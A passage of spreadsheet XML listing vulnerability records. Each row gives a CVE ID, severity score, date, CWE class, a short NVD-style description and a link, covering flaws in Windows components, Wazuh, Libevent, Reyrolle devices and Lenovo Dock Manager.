        <is>
          <t>In multiple functions of alloc.c, there is a possible unauthorized read/write access due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M3369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58848</t>
        </is>
      </c>
    </row>
    <row r="3370">
      <c r="A3370" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61783</t>
        </is>
      </c>
      <c r="C3370" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3370" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3370" s="5" t="inlineStr"/>
      <c r="F3370" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3370" s="5" t="inlineStr"/>
      <c r="H3370" s="5" t="inlineStr"/>
      <c r="I3370" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3370" s="5" t="inlineStr"/>
      <c r="K3370" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-863</t>
        </is>
      </c>
      <c r="L3370" s="5" t="inlineStr">
        <is>
          <t>Wazuh is an open-source security platform providing unified XDR and SIEM protection for endpoints and cloud workloads. In versions 4.14.0 through 4.14.6, an authenticated low-privilege user can read the cluster secret from the manager configuration because the logic that masks sensitive values is disabled by any update-config RBAC rule, including an explicit deny. The mask_sensitive_config() decorator applies masking only when _has_update_permissions() returns false, but that gate treats a user as able to update the config whenever a  manager:update_config  or  cluster:update_config  rule exists, without ever checking whether the rule's effect is allow or deny. Because a deny rule is stored as a real entry, a read-only account that is hardened by explicitly denying config edits is counted as having update permission, which turns masking off. A single authenticated GET request to the configuration endpoint with  raw=true  then returns the verbatim ossec.conf XML with  cluster.key  in clear, whereas an otherwise identical account without the deny rule sees the value masked. This issue is fixed in version 4.14.7.</t>
        </is>
      </c>
      <c r="M3370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61783</t>
        </is>
      </c>
    </row>
    <row r="3371">
      <c r="A3371" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62653</t>
        </is>
      </c>
      <c r="C3371" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3371" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3371" s="5" t="inlineStr"/>
      <c r="F3371" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3371" s="5" t="inlineStr"/>
      <c r="H3371" s="5" t="inlineStr"/>
      <c r="I3371" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3371" s="5" t="inlineStr"/>
      <c r="K3371" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L3371" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The input received over a proprietary communication protocol that is exposed when the device is placed into a special firmware-update mode is not properly validated, resulting in a memory corruption condition. This could allow an unauthenticated attacker with physical access to the device to cause a crash and potentially execute arbitrary code on the device.</t>
        </is>
      </c>
      <c r="M3371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62653</t>
        </is>
      </c>
    </row>
    <row r="3372">
      <c r="A3372" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62654</t>
        </is>
      </c>
      <c r="C3372" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3372" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3372" s="5" t="inlineStr"/>
      <c r="F3372" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3372" s="5" t="inlineStr"/>
      <c r="H3372" s="5" t="inlineStr"/>
      <c r="I3372" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3372" s="5" t="inlineStr"/>
      <c r="K3372" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="L3372" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). A special maintenance mode can be activated via a physical key sequence during device boot, in which the device downloads and executes program code from a network server without verifying its authenticity or integrity. This could allow an attacker with physical access to the device to upload and execute arbitrary, unsigned code.</t>
        </is>
      </c>
      <c r="M3372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62654</t>
        </is>
      </c>
    </row>
    <row r="3373">
      <c r="A3373" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62694</t>
        </is>
      </c>
      <c r="C3373" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3373" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3373" s="5" t="inlineStr"/>
      <c r="F3373" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3373" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3373" s="5" t="inlineStr"/>
      <c r="I3373" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3373" s="5" t="inlineStr"/>
      <c r="K3373" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3373" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62694</t>
        </is>
      </c>
    </row>
    <row r="3374">
      <c r="A3374" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62727</t>
        </is>
      </c>
      <c r="C3374" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3374" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3374" s="5" t="inlineStr"/>
      <c r="F3374" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3374" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H337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374" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3374" s="5" t="inlineStr"/>
      <c r="K3374" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L3374" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Telephony Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62727</t>
        </is>
      </c>
    </row>
    <row r="3375">
      <c r="A3375" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63387</t>
        </is>
      </c>
      <c r="C3375" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3375" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3375" s="5" t="inlineStr"/>
      <c r="F3375" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3375" s="5" t="inlineStr"/>
      <c r="H3375" s="5" t="inlineStr"/>
      <c r="I3375" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J3375" s="5" t="inlineStr"/>
      <c r="K3375" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-193, CWE-787</t>
        </is>
      </c>
      <c r="L3375" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent has an off-by-one stack buffer overflow in evdns.c when dnsname_to_labels formats a name-bearing DNS record at the end of the 64 KB stack buffer allocated by evdns_server_request_format_response. The final-label check permits j plus label_len plus one to equal buf_len, after which the terminating null byte is written to buf[buf_len]. A crafted DNS server response containing PTR, CNAME, MX, NS, or SOA data can trigger the one-byte out-of-bounds write and crash or corrupt the process. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="M3375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63387</t>
        </is>
      </c>
    </row>
    <row r="3376">
      <c r="A3376" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63424</t>
        </is>
      </c>
      <c r="C3376" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3376" s="5" t="inlineStr"/>
      <c r="F3376" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3376" s="5" t="inlineStr"/>
      <c r="H3376" s="5" t="inlineStr">
        <is>
          <t>lenovo:dock_manager</t>
        </is>
      </c>
      <c r="I3376" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3376" s="5" t="inlineStr"/>
      <c r="K3376" s="5" t="inlineStr">
        <is>
          <t>CWE-261</t>
        </is>
      </c>
      <c r="L3376" s="5" t="inlineStr">
        <is>
          <t>During an internal security assessment, an improperly protected key was discovered in Lenovo Dock Manager that could allow a local authenticated user to escalate privileges.</t>
        </is>
      </c>
      <c r="M3376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63424</t>
        </is>
      </c>
    </row>
    <row r="3377">
      <c r="A3377" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68824</t>
        </is>
      </c>
      <c r="C3377" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3377" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3377" s="5" t="inlineStr"/>
      <c r="F3377" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3377" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3377" s="5" t="inlineStr"/>
      <c r="I3377" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3377" s="5" t="inlineStr"/>
      <c r="K3377" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3377" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68824</t>
        </is>
      </c>
    </row>
    <row r="3378">
      <c r="A3378" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68825</t>
        </is>
      </c>
      <c r="C3378" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3378" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3378" s="5" t="inlineStr"/>
      <c r="F3378" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3378" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3378" s="5" t="inlineStr"/>
      <c r="I3378" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3378" s="5" t="inlineStr"/>
      <c r="K3378" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3378" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bind Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68825</t>
        </is>
      </c>
    </row>
    <row r="3379">
      <c r="A3379" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68837</t>
        </is>
      </c>
      <c r="C3379" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3379" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3379" s="5" t="inlineStr"/>
      <c r="F3379" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3379" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3379" s="5" t="inlineStr"/>
      <c r="I3379" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3379" s="5" t="inlineStr"/>
      <c r="K3379" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3379" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68837</t>
        </is>
      </c>
    </row>
    <row r="3380">
      <c r="A3380" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68840</t>
        </is>
      </c>
      <c r="C3380" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3380" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3380" s="5" t="inlineStr"/>
      <c r="F3380" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3380" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3380" s="5" t="inlineStr"/>
      <c r="I3380" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3380" s="5" t="inlineStr"/>
      <c r="K3380" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3380" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68840</t>
        </is>
      </c>
    </row>
    <row r="3381">
      <c r="A3381" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68847</t>
        </is>
      </c>
      <c r="C3381" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3381" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3381" s="5" t="inlineStr"/>
      <c r="F3381" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3381" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3381" s="5" t="inlineStr"/>
      <c r="I3381" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3381" s="5" t="inlineStr"/>
      <c r="K3381" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3381" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68847</t>
        </is>
      </c>
    </row>
    <row r="3382">
      <c r="A3382" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68884</t>
        </is>
      </c>
      <c r="C3382" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3382" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3382" s="5" t="inlineStr"/>
      <c r="F3382" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3382" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3382" s="5" t="inlineStr"/>
      <c r="I3382" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3382" s="5" t="inlineStr"/>
      <c r="K3382" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3382" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68884</t>
        </is>
      </c>
    </row>
    <row r="3383">
      <c r="A3383" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68897</t>
        </is>
      </c>
      <c r="C3383" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3383" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3383" s="5" t="inlineStr"/>
      <c r="F3383" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3383" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3383" s="5" t="inlineStr"/>
      <c r="I3383" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3383" s="5" t="inlineStr"/>
      <c r="K3383" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3383" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68897</t>
        </is>
      </c>
    </row>
    <row r="3384">
      <c r="A3384" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69275</t>
        </is>
      </c>
      <c r="C3384" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3384" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3384" s="5" t="inlineStr"/>
      <c r="F3384" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3384" s="5" t="inlineStr"/>
      <c r="H3384" s="5" t="inlineStr"/>
      <c r="I3384" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3384" s="5" t="inlineStr"/>
      <c r="K3384" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3384" s="5" t="inlineStr">
        <is>
          <t>Use after free in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69275</t>
        </is>
      </c>
    </row>
    <row r="3385">
      <c r="A3385" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69279</t>
        </is>
      </c>
      <c r="C3385" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3385" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3385" s="5" t="inlineStr"/>
      <c r="F3385" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3385" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3385" s="5" t="inlineStr"/>
      <c r="I3385" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3385" s="5" t="inlineStr"/>
      <c r="K3385" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3385" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69279</t>
        </is>
      </c>
    </row>
    <row r="3386">
      <c r="A3386" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69280</t>
        </is>
      </c>
      <c r="C3386" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3386" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3386" s="5" t="inlineStr"/>
      <c r="F3386" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3386" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3386" s="5" t="inlineStr"/>
      <c r="I3386" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3386" s="5" t="inlineStr"/>
      <c r="K3386" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3386" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69280</t>
        </is>
      </c>
    </row>
    <row r="3387">
      <c r="A3387" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69281</t>
        </is>
      </c>
      <c r="C3387" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3387" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3387" s="5" t="inlineStr"/>
      <c r="F3387" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3387" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3387" s="5" t="inlineStr"/>
      <c r="I3387" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3387" s="5" t="inlineStr"/>
      <c r="K3387" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3387" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows License Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69281</t>
        </is>
      </c>
    </row>
    <row r="3388">
      <c r="A3388" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69287</t>
        </is>
      </c>
      <c r="C3388" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3388" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3388" s="5" t="inlineStr"/>
      <c r="F3388" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3388" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3388" s="5" t="inlineStr"/>
      <c r="I3388" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3388" s="5" t="inlineStr"/>
      <c r="K3388" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3388" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69287</t>
        </is>
      </c>
    </row>
    <row r="3389">
      <c r="A3389" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69292</t>
        </is>
      </c>
      <c r="C3389" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3389" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3389" s="5" t="inlineStr"/>
      <c r="F3389" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3389" s="5" t="inlineStr"/>
      <c r="H3389" s="5" t="inlineStr"/>
      <c r="I3389" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3389" s="5" t="inlineStr"/>
      <c r="K3389" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L3389" s="5" t="inlineStr">
        <is>
          <t>Double free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69292</t>
        </is>
      </c>
    </row>
    <row r="3390">
      <c r="A3390" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69299</t>
        </is>
      </c>
      <c r="C3390" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3390" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3390" s="5" t="inlineStr"/>
      <c r="F3390" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3390" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H3390" s="5" t="inlineStr"/>
      <c r="I3390" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3390" s="5" t="inlineStr"/>
      <c r="K3390" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3390" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft COM for Windows allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69299</t>
        </is>
      </c>
    </row>
    <row r="3391">
      <c r="A3391" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69300</t>
        </is>
      </c>
      <c r="C3391" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3391" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3391" s="5" t="inlineStr"/>
      <c r="F3391" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3391" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3391" s="5" t="inlineStr"/>
      <c r="I3391" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3391" s="5" t="inlineStr"/>
      <c r="K3391" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3391" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69300</t>
        </is>
      </c>
    </row>
    <row r="3392">
      <c r="A3392" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69309</t>
        </is>
      </c>
      <c r="C3392" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3392" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3392" s="5" t="inlineStr"/>
      <c r="F3392" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3392" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3392" s="5" t="inlineStr"/>
      <c r="I3392" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3392" s="5" t="inlineStr"/>
      <c r="K3392" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L3392" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69309</t>
        </is>
      </c>
    </row>
    <row r="3393">
      <c r="A3393" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69310</t>
        </is>
      </c>
      <c r="C3393" s="5" t="n">
